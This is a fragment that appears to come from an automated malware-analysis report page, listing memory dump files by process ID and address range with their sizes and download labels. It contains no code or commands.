                                        Filesize

                                        652KB

                                        Download

                                      • memory/1512-77-0x00007FFA9F7B0000-0x00007FFA9F853000-memory.dmp

                                        Filesize

                                        652KB

                                        Download

                                      • memory/1512-2-0x000002D242140000-0x000002D242162000-memory.dmp

                                        Filesize

                                        136KB

                                        Download

                                      • memory/1512-0-0x00007FFA9F7B0000-0x00007FFA9F853000-memory.dmp

                                        Filesize

                                        652KB

                                        Download

                                      • memory/1512-11-0x00007FFA9F7B0000-0x00007FFA9F853000-memory.dmp

                                        Filesize

                                        652KB

                                        Download

                                      • memory/1512-12-0x000002D242200000-0x000002D242208000-memory.dmp

                                        Filesize

                                        32KB

                                        Download

                                      • memory/4696-20-0x00007FFA9F7B0000-0x00007FFA9F853000-memory.dmp

                                        Filesize

                                        652KB

                                        Download

                                      • memory/4696-19-0x00007FFA9F7B0000-0x00007FFA9F853000-memory.dmp

                                        Filesize

                                        652KB

                                        Download

                                      • memory/4696-39-0x00007FFA9F7B0000-0x00007FFA9F853000-memory.dmp

                                        Filesize

                                        652KB

                                        Download

                                      • memory/4964-67-0x000001C9187D0000-0x000001C9187E0000-memory.dmp

                                        Filesize

                                        64KB

                                        Download

                                      • memory/4964-80-0x000001C9188C0000-0x000001C9188CC000-memory.dmp

                                        Filesize

                                        48KB

                                        Download